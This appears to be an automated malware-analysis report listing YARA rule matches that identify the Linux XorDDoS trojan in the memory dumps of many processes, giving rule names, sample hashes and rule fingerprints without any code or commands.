Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
